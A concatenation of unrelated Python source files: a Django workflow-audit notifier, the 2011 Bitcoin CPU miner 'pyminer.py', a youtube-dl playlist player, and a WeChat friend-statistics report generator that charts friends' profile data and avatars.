workflow_url = kwargs.get('workflow_url')
webhook_url = SqlGroup.objects.get(group_id=audit_info.group_id).ding_webhook
audit_info = WorkflowAudit.objects.get(workflow_id=workflow_id, workflow_type=workflow_type)
if audit_info.audit_auth_groups == '':
workflow_auditors = '无需审批'
else:
try:
workflow_auditors = '->'.join([Group.objects.get(id=auth_group_id).name for auth_group_id in
audit_info.audit_auth_groups.split(',')])
except Exception:
workflow_auditors = audit_info.audit_auth_groups
if audit_info.current_audit == '-1':
current_workflow_auditors = None
else:
try:
current_workflow_auditors = Group.objects.get(id=audit_info.current_audit).name
except Exception:
current_workflow_auditors = audit_info.current_audit
# 准备消息内容
if workflow_type == WorkflowDict.workflow_type['query']:
workflow_type_display = WorkflowDict.workflow_type['query_display']
workflow_detail = QueryPrivilegesApply.objects.get(apply_id=workflow_id)
try:
workflow_audit_remark = WorkflowAuditDetail.objects.filter(audit_id=audit_id).latest('audit_time').remark
except Exception:
workflow_audit_remark = ''
if workflow_detail.priv_type == 1:
workflow_content = '''数据库清单:{}\n授权截止时间:{}\n结果集:{}\n'''.format(
workflow_detail.db_list,
datetime.datetime.strftime(workflow_detail.valid_date, '%Y-%m-%d %H:%M:%S'),
workflow_detail.limit_num)
elif workflow_detail.priv_type == 2:
workflow_content = '''数据库:{}\n表清单:{}\n授权截止时间:{}\n结果集:{}\n'''.format(
workflow_detail.db_list,
workflow_detail.table_list,
datetime.datetime.strftime(workflow_detail.valid_date, '%Y-%m-%d %H:%M:%S'),
workflow_detail.limit_num)
elif workflow_type == WorkflowDict.workflow_type['sqlreview']:
workflow_type_display = WorkflowDict.workflow_type['sqlreview_display']
workflow_detail = SqlWorkflow.objects.get(pk=workflow_id)
workflow_audit_remark = workflow_detail.audit_remark
workflow_content = re.sub('[\r\n\f]{2,}', '\n', workflow_detail.sql_content[0:500].replace('\r', ''))
else:
raise Exception('工单类型不正确')
# 准备消息格式
if status == WorkflowDict.workflow_status['audit_wait']: # 申请阶段
msg_title = "[{}]新的工单申请#{}".format(workflow_type_display, audit_id)
# 接收人,发送给该资源组内对应权限组所有的用户
auth_group_names = Group.objects.get(id=audit_info.current_audit).name
msg_email_reciver = [user.email for user in
auth_group_users([auth_group_names], audit_info.group_id)]
# 抄送对象
email_cc = kwargs.get('email_cc', [])
msg_email_cc = email_cc
msg_content = '''发起人:{}\n审批流程:{}\n当前审批:{}\n工单名称:{}\n工单地址:{}\n工单详情预览:{}\n'''.format(
workflow_from,
workflow_auditors,
current_workflow_auditors,
workflow_title,
workflow_url,
workflow_content)
elif status == WorkflowDict.workflow_status['audit_success']: # 审核通过
msg_title = "[{}]工单审核通过#{}".format(workflow_type_display, audit_id)
# 接收人
msg_email_reciver = [Users.objects.get(username=audit_info.create_user).email]
# 抄送对象
msg_email_cc = kwargs.get('email_cc', [])
msg_content = '''发起人:{}\n审批流程:{}\n工单名称:{}\n工单地址:{}\n工单详情预览:{}\n'''.format(
workflow_from,
workflow_auditors,
workflow_title,
workflow_url,
workflow_content)
elif status == WorkflowDict.workflow_status['audit_reject']: # 审核驳回
msg_title = "[{}]工单被驳回#{}".format(workflow_type_display, audit_id)
# 接收人
msg_email_reciver = [Users.objects.get(username=audit_info.create_user).email]
msg_email_cc = []
msg_content = '''工单名称:{}\n工单地址:{}\n驳回原因:{}\n提醒:此工单被审核不通过,请按照驳回原因进行修改!'''.format(
workflow_title,
workflow_url,
workflow_audit_remark)
elif status == WorkflowDict.workflow_status['audit_abort']: # 审核取消,通知所有审核人
msg_title = "[{}]提交人主动终止工单#{}".format(workflow_type_display, audit_id)
# 接收人,发送给该资源组内对应权限组所有的用户
auth_group_names = [Group.objects.get(id=auth_group_id).name for auth_group_id in
audit_info.audit_auth_groups.split(',')]
msg_email_reciver = [user.email for user in auth_group_users(auth_group_names, audit_info.group_id)]
msg_email_cc = []
msg_content = '''发起人:{}\n工单名称:{}\n工单地址:{}\n提醒:提交人主动终止流程'''.format(
workflow_from,
workflow_title,
workflow_url)
else:
raise Exception('工单状态不正确')
if isinstance(msg_email_reciver, str):
msg_email_reciver = [msg_email_reciver]
if isinstance(msg_email_cc, str):
msg_email_cc = [msg_email_cc]
# 判断是发送钉钉还是发送邮件
if msg_type == 0:
if sys_config.get('mail'):
msg_sender.send_email(msg_title, msg_content, msg_email_reciver, listCcAddr=msg_email_cc)
if sys_config.get('ding'):
msg_sender.send_ding(webhook_url, msg_title + '\n' + msg_content)
if msg_type == 1 and sys_config.get('mail'):
msg_sender.send_email(msg_title, msg_content, msg_email_reciver, listCcAddr=msg_email_cc)
elif msg_type == 2 and sys_config.get('ding'):
msg_sender.send_ding(webhook_url, msg_title + '\n' + msg_content)
# 异步调用
def send_msg(audit_id, msg_type, **kwargs):
logger.debug('异步发送消息通知')
p = Thread(target=_send, args=(audit_id, msg_type), kwargs=kwargs)
p.start()
|
pyminer.py
|
#!/usr/bin/python
#
# Copyright (c) 2011 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class BitcoinRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] != None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
# the first 76b of 80b do not change
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(blk_hdr)
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("<I", nonce)
# hash final 4b, the nonce value
hash1_o = static_hash.copy()
hash1_o.update(nonce_bin)
hash1 = hash1_o.digest()
# sha256 hash of sha256 hash
hash_o = hashlib.sha256()
hash_o.update(hash1)
hash = hash_o.digest()
# quick test for winning solution: high 32 bits zero?
if hash[-4:] != '\0\0\0\0':
continue
# convert binary hash to 256-bit Python long
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hash.encode('hex')
l = long(hash_str, 16)
# proof-of-work test: hash < target
if l < target:
print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
return (nonce + 1, nonce_bin)
else:
print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
# return (nonce + 1, nonce_bin)
return (nonce + 1, None)
def submit_work(self, rpc, original_data, nonce_bin):
nonce_bin = bufreverse(nonce_bin)
nonce = nonce_bin.encode('hex')
solution = original_data[:152] + nonce + original_data[160:256]
param_arr = [ solution ]
result = rpc.getwork(param_arr)
print time.asctime(), "--> Upstream RPC result:", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = BitcoinRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
def miner_thread(id):
miner = Miner(id)
miner.loop()
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: pyminer.py CONFIG-FILE"
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 5050
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
stream.py
|
import os
import time
import eel
from pygame import mixer
from mutagen.mp3 import MP3
import threading
os.system('cls')
print('')
print('example:- https://www.youtube.com/playlist?list=XYZ123ABC')
link = str(input('ENTER A YOUTUBE PLAYLIST/VIDEO LINK:- '))
print('')
with open('config.txt') as f:
Store_Temp_Streaming_Data = f.readline()
Default_Local_Music_Dir = f.readline()
dir = Store_Temp_Streaming_Data[27:][:-1]
eel.init("web") # initialises eel
arr = [] #array keeps track of all songs
i = 0
o = 0 #counter for songs
status = 1 #for play/pause status
vol = 1.0 #controls volume (1.0 = maximum volume)
def yt_dl():
try:
os.makedirs(dir)
except FileExistsError:
pass
os.chdir(dir)
os.system('youtube-dl --no-check-certificate --no-overwrites --ignore-errors --no-continue --rm-cache-dir --no-part -q --metadata-from-title "%(artist)s - %(title)s" --audio-quality 0 -x --audio-format mp3 ' + link)
# adds all songs to array
def updater():
global i
global o
try:
if i != len(os.listdir(dir)) - 3:
if os.listdir(dir)[i][-4:] == '.mp3':
if os.listdir(dir)[i] not in arr:
arr.append(os.listdir(dir)[i])
i += 1
except:
i = 0
@eel.expose
def play():
# plays music
global status
status = 1
mixer.music.unpause()
updater()
return 'play'
@eel.expose
# pauses music
def pause():
global status
status = 0
mixer.music.pause()
updater()
return 'pause'
@eel.expose
# increases volume
def vol_up():
global vol
vol += 0.1
if vol > 1.0:
vol = 1.0
mixer.music.set_volume(vol)
return str('volume: ' + str(round(vol * 100)))
@eel.expose
# decreases volume
def vol_down():
global vol
vol -= 0.1
if vol < 0.1:
vol = 0
mixer.music.set_volume(vol)
return str('volume: ' + str(round(vol * 100)))
@eel.expose
def next():
global arr
global o
global status
# if music is not paused
if status == 1:
if o + 1 != len(arr):
# loads and plays next song
try:
o += 1
mixer.music.load(dir + "\\" + arr[o])
except:
return
mixer.music.play()
updater()
return [arr[o][:-16], 'next']
# if all songs have been played, it starts playing from the begining
else:
o = 0
mixer.music.load(dir + "\\" + arr[o])
mixer.music.play()
updater()
return [arr[o][:-16], 'next']
# if music is paused
elif status == 0:
if o + 1 != len(arr):
# loads and plays next song
try:
o += 1
mixer.music.load(dir + "\\" + arr[o])
except:
o += 1
mixer.music.load(dir + "\\" + arr[o])
return
mixer.music.play()
mixer.music.pause()
updater()
return [arr[o][:-16], 'next']
# if all songs have been played, it starts playing from the begining
else:
o = 0
mixer.music.load(dir + "\\" + arr[o])
mixer.music.play()
updater()
return [arr[o][:-16], 'next']
@eel.expose
def previous():
global arr
global o
global status
# if music is not paused
if status == 1:
# loads and plays previous song
try:
o -= 1
mixer.music.load(dir + "\\" + arr[o])
except:
return
mixer.music.play()
updater()
return [arr[o][:-16], 'previous']
# if music is paused
elif status == 0:
# loads and plays previous song
try:
o -= 1
mixer.music.load(dir + "\\" + arr[o])
except:
return
mixer.music.play()
mixer.music.pause()
updater()
return [arr[o][:-16], 'previous']
@eel.expose
def main():
global arr
global o
global status
# updates the HTML header with the current playing song
eel.name_update(arr[o][:-16])
# gets song length
def length():
length = MP3(dir + "\\" + arr[o]).info.length
return int(length)
# updates song slider bar
while mixer.music.get_busy() != 0:
updater()
os.system('cls')
print('songs loaded: ', len(arr))
print('now playing: ', '#' + str(o + 1) , arr[o][:-16])
eel.time(int((((mixer.music.get_pos()) / 1000) / length()) * 100000000))
while status == 0:
updater()
os.system('cls')
print('songs loaded: ', len(arr))
print('now playing: ', '#' + str(o + 1) , arr[o][:-16])
eel.time(int((((mixer.music.get_pos()) / 1000) / length()) * 100000000))
# plays next song if song has finished
if mixer.music.get_busy() == 0:
o += 1
if o != len(arr):
mixer.music.load(dir + "\\" + arr[o])
mixer.music.play()
main()
else:
o = 0
mixer.music.load(dir + "\\" + arr[o])
mixer.music.play()
main()
# Starts the index.html file
def start0():
eel.start("index.html", size=(551, 390), position=(0,0))
def init():
mixer.init()
os.system('cls')
print('loading, please be patient...')
# clears old data
dir_counter = 0
while len(os.listdir(dir)) != 3:
try:
if os.listdir(dir)[dir_counter][-3:] != 'exe':
os.remove(dir + r'//' + os.listdir(dir)[dir_counter])
dir_counter += 1
except:
dir_counter = 0
while len(arr) == 0:
updater()
# loads initial song
def loader():
time.sleep(1)
try:
mixer.music.load(dir + '\\' + arr[o])
except:
loader()
loader()
os.system('cls')
mixer.music.play()
if __name__ == '__main__':
threading.Thread(target = yt_dl).start()
init()
threading.Thread(target = main).start()
start0()
|
generate_wx_data.py
|
# -*- coding:utf-8 -*-
from wxpy import *
from platform import system
from os.path import exists
from os import makedirs
from os import listdir
from shutil import rmtree
from queue import Queue
from threading import Thread
from time import sleep
from pyecharts import Pie
from pyecharts import Map
from pyecharts import WordCloud
from pyecharts import Bar
from requests import post
import PIL.Image as Image
import re
import random
import math
from cv2 import CascadeClassifier
from cv2 import imread
from cv2 import cvtColor
from cv2 import COLOR_BGR2GRAY
# 引入打开文件所用的库
# Window与Linux和Mac OSX有所不同
# lambda用来定义一个匿名函数,可实现类似c语言的define定义
if ('Windows' in system()):
# Windows
from os import startfile
open_html = lambda x: startfile(x)
elif ('Darwin' in system()):
# MacOSX
from subprocess import call
open_html = lambda x: call(["open", x])
else:
# Linux
from subprocess import call
open_html = lambda x: call(["xdg-open", x])
# 分析好友性别比例
def sex_ratio():
# 初始化
male, female, other = 0, 0, 0
# 遍历
for user in friends:
if (user.sex == 1):
male += 1
elif (user.sex == 2):
female += 1
else:
other += 1
name_list = ['男性', '女性', '未设置']
num_list = [male, female, other]
pie = Pie("微信好友性别比例")
pie.add("", name_list, num_list, is_label_show=True)
pie.render('data/好友性别比例.html')
# 分析好友地区分布
def region_distribution():
# 使用一个字典统计好友地区分布数量
province_dict = {'北京': 0, '上海': 0, '天津': 0, '重庆': 0,
'河北': 0, '山西': 0, '吉林': 0, '辽宁': 0, '黑龙江': 0,
'陕西': 0, '甘肃': 0, '青海': 0, '山东': 0, '福建': 0,
'浙江': 0, '台湾': 0, '河南': 0, '湖北': 0, '湖南': 0,
'江西': 0, '江苏': 0, '安徽': 0, '广东': 0, '海南': 0,
'四川': 0, '贵州': 0, '云南': 0, '内蒙古': 0, '新疆': 0,
'宁夏': 0, '广西': 0, '西藏': 0, '香港': 0, '澳门': 0}
# 遍历
for user in friends:
# 判断省份是否存在,有可能是外国的,这种情况不考虑
if (user.province in province_dict):
key = user.province
province_dict[key] += 1
province = list(province_dict.keys())
values = list(province_dict.values())
# maptype='china' 只显示全国直辖市和省级,数据只能是省名和直辖市的名称
map = Map("微信好友地区分布")
map.add("", province, values, visual_range=[0, 50], maptype='china', is_visualmap=True, visual_text_color='#000')
map.render(path="data/好友地区分布.html")
# 对好友数最多的省份进行一进步分析
max_count_province = ''
for key, value in province_dict.items():
if (value == max(province_dict.values())):
max_count_province = key
break
# 使用一个字典统计好友地区分布数量
city_dict = {}
# 遍历
for user in friends:
if (user.province == max_count_province):
# 更新键值对
if (user.city in city_dict.keys()):
city_dict[user.city] += 1
else:
city_dict[user.city] = 1
bar = Bar(max_count_province + '中,好友地区分布')
bar.add(name='地区分布', x_axis=[x for x in city_dict.keys()], y_axis=[x for x in city_dict.values()])
bar.render('data/某省好友地区分布.html')
# 统计认识的好友的比例
def statistics_friends():
# 初始化
unknown, known_male, known_female, known_other = 0, 0, 0, 0
# 遍历
for user in friends:
# 备注不为空
if ((user.remark_name).strip()):
if (user.sex == 1):
known_male += 1
elif (user.sex == 2):
known_female += 1
else:
known_other += 1
else:
unknown += 1
name_list = ['未设置备注的好友', '设置备注的男性好友', '设置备注的女性好友', '设置备注的其他好友']
num_list = [unknown, known_male, known_female, known_other]
pie = Pie("你认识的好友比例", title_pos='center')
pie.add("", name_list, num_list, is_label_show=True, legend_orient="vertical", legend_pos="left")
pie.render('data/你认识的好友比例.html')
# 分析备注名称
def analyze_remark_name():
close_partner_dict = {'宝宝,猪,仙女,亲爱,老婆': 0, '老公': 0, '父亲,爸': 0, '母亲,妈': 0, '闺蜜,死党,基友': 0}
# 遍历好友数据
for user in friends:
for key in close_partner_dict.keys():
# 判断该好友备注名是否包含close_partner_dict中的任意一个key
name = key.split(',')
for sub_name in name:
if (sub_name in user.remark_name):
close_partner_dict[key] += 1
break
name_list = ['最重要的她', '最重要的他', '爸爸', '妈妈', '死党']
num_list = [x for x in close_partner_dict.values()]
pie = Pie("可能是你最亲密的人")
pie.add("", name_list, num_list, is_label_show=True, is_legend_show=False)
pie.render('data/你最亲密的人.html')
# 分析个性签名
def analyze_signature():
# 个性签名列表
data = []
for user in friends:
# 清除签名中的微信表情emoj,即<span class.*?</span>
# 使用正则查找并替换方式,user.signature为源文本,将<span class.*?</span>替换成空
new_signature = re.sub(re.compile(r"<span class.*?</span>", re.S), "", user.signature)
# 只保留签名为1行的数据,过滤为多行的签名
if (len(new_signature.split('\n')) == 1):
data.append(new_signature)
# 将个性签名列表转为string
data = '\n'.join(data)
# 进行分词处理,调用接口进行分词
# 这里不使用jieba或snownlp的原因是无法打包成exe文件或者打包后文件非常大
postData = {'data': data, 'type': 'exportword', 'arg': '', 'beforeSend': 'undefined'}
response = post('http://life.chacuo.net/convertexportword', data=postData)
data = response.text.replace('{"status":1,"info":"ok","data":["', '')
# 解码
data = data.encode('utf-8').decode('unicode_escape')
# 将返回的分词结果json字符串转化为python对象,并做一些处理
data = data.split("=====================================")[0]
# 将分词结果转化为list,根据分词结果,可以知道以2个空格为分隔符
data = data.split(' ')
# 对分词结果数据进行去除一些无意义的词操作
stop_words_list = [',', ',', '、', 'the', 'a', 'is', '…', '·', 'э', 'д', 'э', 'м', 'ж', 'и', 'л', 'т', 'ы', 'н', 'з',
'м', '…', '…', '…', '…', '…', '、', '.', '。', '!', '!', ':', ':', '~', '|', '▽', '`', 'ノ', '♪',
'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's',
't', 'u', 'v', 'w', 'x', 'y', 'z', 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L',
'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z', '0', '1', '2', '3', '4',
'5', '6', '7', '8', '9', '\'', '‘', '’', '“', '”', '的', '了', '是', '你', '我', '他', '她', '=', '\r',
'\n', '\r\n', '\t', '以下关键词', '[', ']', '{', '}', '(', ')', '(', ')', 'span', '<', '>', 'class',
'html', '?', '就', '于', '下', '在', '吗', '嗯']
tmp_data = []
for word in data:
if (word not in stop_words_list):
tmp_data.append(word)
data = tmp_data
# 进行词频统计,结果存入字典signature_dict中
signature_dict = {}
for index, word in enumerate(data):
print(u'正在统计好友签名数据,进度%d/%d,请耐心等待……' % (index + 1, len(data)))
if (word in signature_dict.keys()):
signature_dict[word] += 1
else:
signature_dict[word] = 1
# 开始绘制词云
name = [x for x in signature_dict.keys()]
value = [x for x in signature_dict.values()]
wordcloud = WordCloud('微信好友个性签名词云图')
wordcloud.add("", name, value, shape='star', word_size_range=[1, 100])
wordcloud.render('data/好友个性签名词云.html')
# 下载好友头像,此步骤消耗时间比较长
def download_head_image(thread_name):
# 队列不为空的情况
while (not queue_head_image.empty()):
# 取出一个好友元素
user = queue_head_image.get()
# 下载该好友头像,并保存到指定位置,生成一个15位数的随机字符串
random_file_name = ''.join([str(random.randint(0, 9)) for x in range(15)])
user.get_avatar(save_path='image/' + random_file_name + '.jpg')
# 输出提示
print(
u'线程%d:正在下载微信好友头像数据,进度%d/%d,请耐心等待……' % (thread_name, len(friends) - queue_head_image.qsize(), len(friends)))
# 生成一个html文件,并保存到文件file_name中
def generate_html(file_name):
with open(file_name, 'w', encoding='utf-8') as f:
data = '''
<meta http-equiv='Content-Type' content='text/html; charset=utf-8'>
<meta charset="UTF-8">
<title>一键生成微信个人专属数据报告(了解你的微信社交历史)</title>
<meta name='keywords' content='微信个人数据'>
<meta name='description' content=''>
<iframe name="iframe1" marginwidth=0 marginheight=0 width=100% height=60% src="data/好友地区分布.html" frameborder=0></iframe>
<iframe name="iframe2" marginwidth=0 marginheight=0 width=100% height=60% src="data/某省好友地区分布.html" frameborder=0></iframe>
<iframe name="iframe3" marginwidth=0 marginheight=0 width=100% height=60% src="data/好友性别比例.html" frameborder=0></iframe>
<iframe name="iframe4" marginwidth=0 marginheight=0 width=100% height=60% src="data/你认识的好友比例.html" frameborder=0></iframe>
<iframe name="iframe5" marginwidth=0 marginheight=0 width=100% height=60% src="data/你最亲密的人.html" frameborder=0></iframe>
<iframe name="iframe6" marginwidth=0 marginheight=0 width=100% height=60% src="data/特殊好友分析.html" frameborder=0></iframe>
<iframe name="iframe7" marginwidth=0 marginheight=0 width=100% height=60% src="data/共同所在群聊分析.html" frameborder=0></iframe>
<iframe name="iframe8" marginwidth=0 marginheight=0 width=100% height=60% src="data/好友个性签名词云.html" frameborder=0></iframe>
<iframe name="iframe9" marginwidth=0 marginheight=0 width=100% height=60% src="data/微信好友头像拼接图.html" frameborder=0></iframe>
<iframe name="iframe10" marginwidth=0 marginheight=0 width=100% height=60% src="data/使用人脸的微信好友头像拼接图.html" frameborder=0></iframe>
'''
f.write(data)
# 初始化所需文件夹
def init_folders():
if (not (exists('image'))):
makedirs('image')
else:
rmtree('image')
makedirs('image')
if (not (exists('data'))):
makedirs('data')
else:
rmtree('data')
makedirs('data')
# 拼接所有微信好友头像
def merge_head_image():
# 拼接头像
pics = listdir('image') # 得到user目录下的所有文件,即各个好友头像
numPic = len(pics)
eachsize = int(math.sqrt(float(640 * 640) / numPic)) # 先圈定每个正方形小头像的边长,如果嫌小可以加大
numrow = int(640 / eachsize)
numcol = int(numPic / numrow) # 向下取整
toImage = Image.new('RGB', (eachsize * numrow, eachsize * numcol)) # 先生成头像集模板
x = 0 # 小头像拼接时的左上角横坐标
y = 0 # 小头像拼接时的左上角纵坐标
for index, i in enumerate(pics):
print(u'正在拼接微信好友头像数据,进度%d/%d,请耐心等待……' % (index + 1, len(pics)))
try:
# 打开图片
img = Image.open('image/' + i)
except IOError:
print(u'Error: 没有找到文件或读取文件失败')
else:
# 缩小图片
img = img.resize((eachsize, eachsize), Image.ANTIALIAS)
# 拼接图片
toImage.paste(img, (x * eachsize, y * eachsize))
x += 1
if x == numrow:
x = 0
y += 1
toImage.save('data/拼接' + ".jpg")
# 生成一个网页
with open('data/微信好友头像拼接图.html', 'w', encoding='utf-8') as f:
data = '''
<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv='Content-Type' content='text/html; charset=utf-8'>
<meta charset="utf-8" />
<title>微信好友头像拼接图</title>
</head>
<body>
<p><font size=4px><strong>微信好友头像拼接图</strong></font></p>
<img src="拼接.jpg" />
</body>
</html>
'''
f.write(data)
# 检测使用真实人脸的好友个数
def detect_human_face():
# 得到user目录下的所有文件名称,即各个好友头像
pics = listdir('image')
# 使用人脸的头像个数
count_face_image = 0
# 存储使用人脸的头像的文件名
list_name_face_image = []
# 加载人脸识别模型
face_cascade = CascadeClassifier('E:\PyCharmSpace\Python-X\cn\wechatreport\model\haarcascade_frontalface_default.xml')
for index, file_name in enumerate(pics):
print(u'正在进行人脸识别,进度%d/%d,请耐心等待……' % (index + 1, len(pics)))
# 读取图片
img = imread('image/' + file_name)
# 检测图片是否读取成功,失败则跳过
if img is None:
continue
# 对图片进行灰度处理
gray = cvtColor(img, COLOR_BGR2GRAY)
# 进行实际的人脸检测,传递参数是scaleFactor和minNeighbor,分别表示人脸检测过程中每次迭代时图
faces = face_cascade.detectMultiScale(gray, 1.3, 5)
if (len(faces) > 0):
count_face_image += 1
list_name_face_image.append(file_name)
print(u'使用人脸的头像%d/%d' % (count_face_image, len(pics)))
# 开始拼接使用人脸的头像
pics = list_name_face_image
numPic = len(pics)
eachsize = int(math.sqrt(float(640 * 640) / numPic)) # 先圈定每个正方形小头像的边长,如果嫌小可以加大
numrow = int(640 / eachsize)
numcol = int(numPic / numrow) # 向下取整
toImage = Image.new('RGB', (eachsize * numrow, eachsize * numcol)) # 先生成头像集模板
x = 0 # 小头像拼接时的左上角横坐标
y = 0 # 小头像拼接时的左上角纵坐标
for index, i in enumerate(pics):
print(u'正在拼接使用人脸的微信好友头像数据,进度%d/%d,请耐心等待……' % (index + 1, len(pics)))
try:
# 打开图片
img = Image.open('image/' + i)
except IOError:
print(u'Error: 没有找到文件或读取文件失败')
else:
# 缩小图片
img = img.resize((eachsize, eachsize), Image.ANTIALIAS)
# 拼接图片
toImage.paste(img, (x * eachsize, y * eachsize))
x += 1
if x == numrow:
x = 0
y += 1
toImage.save('data/使用人脸的拼接' + ".jpg")
# 生成一个网页
with open('data/使用人脸的微信好友头像拼接图.html', 'w', encoding='utf-8') as f:
data = '''
<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv='Content-Type' content='text/html; charset=utf-8'>
<meta charset="utf-8" />
<title>使用人脸的微信好友头像拼接图</title>
</head>
<body>
<p><font size=4px><strong>描述内容</strong></font></p>
<img src="使用人脸的拼接.jpg" />
</body>
</html>
'''
data = data.replace('描述内容', '在{}个好友中,有{}个好友使用真实的人脸作为头像'.format(len(friends), count_face_image))
f.write(data)
# 特殊好友分析
def analyze_special_friends():
# 星标好友(很重要的人), 不让他看我的朋友圈的好友, 不看他朋友圈的好友, 消息置顶好友, 陌生人
star_friends, hide_my_post_friends, hide_his_post_friends, sticky_on_top_friends, stranger_friends = 0, 0, 0, 0, 0
for user in friends:
# 星标好友为1,为0表示非星标,不存在星标选项的为陌生人
if ('StarFriend' in (user.raw).keys()):
if ((user.raw)['StarFriend'] == 1):
star_friends += 1
else:
stranger_friends += 1
# 好友类型及权限:1和3好友,259和33027不让他看我的朋友圈,65539和65537和66051不看他的朋友圈,65795两项设置全禁止, 73731陌生人
if ((user.raw)['ContactFlag'] in [259, 33027, 65795]):
hide_my_post_friends += 1
if ((user.raw)['ContactFlag'] in [66051, 65537, 65539, 65795]):
hide_his_post_friends += 1
# 消息置顶好友为2051
if ((user.raw)['ContactFlag'] in [2051]):
sticky_on_top_friends += 1
# 陌生人
if ((user.raw)['ContactFlag'] in [73731]):
stranger_friends += 1
bar = Bar('特殊好友分析')
bar.add(name='', x_axis=['星标', '不让他看我朋友圈', '不看他朋友圈', '消息置顶', '陌生人'],
y_axis=[star_friends, hide_my_post_friends, hide_his_post_friends, sticky_on_top_friends, stranger_friends],
legend_orient="vertical", legend_pos="left")
bar.render('data/特殊好友分析.html')
# 共同所在群聊成员分析
def group_common_in():
# 获取所有活跃的群聊
groups = bot.groups()
# 每个好友与你相同的群聊个数
dict_common_in = {}
# 遍历所有好友,第0个为你自己,所以去掉
for x in friends[1:]:
# 依次在每个群聊中搜索
for y in groups:
# x在y中
if (x in y):
# 获取微信名称
name = x.nick_name
# 判断是否有备注,有的话就使用备注
if (x.remark_name and x.remark_name != ''):
name = x.remark_name
# 增加计数
if (name in dict_common_in.keys()):
dict_common_in[name] += 1
else:
dict_common_in[name] = 1
# 从dict_common_in结果中取出前n大个数据
n = 0
if (len(dict_common_in) > 5):
n = 6
elif (len(dict_common_in) > 4):
n = 5
elif (len(dict_common_in) > 3):
n = 4
elif (len(dict_common_in) > 2):
n = 3
elif (len(dict_common_in) > 1):
n = 2
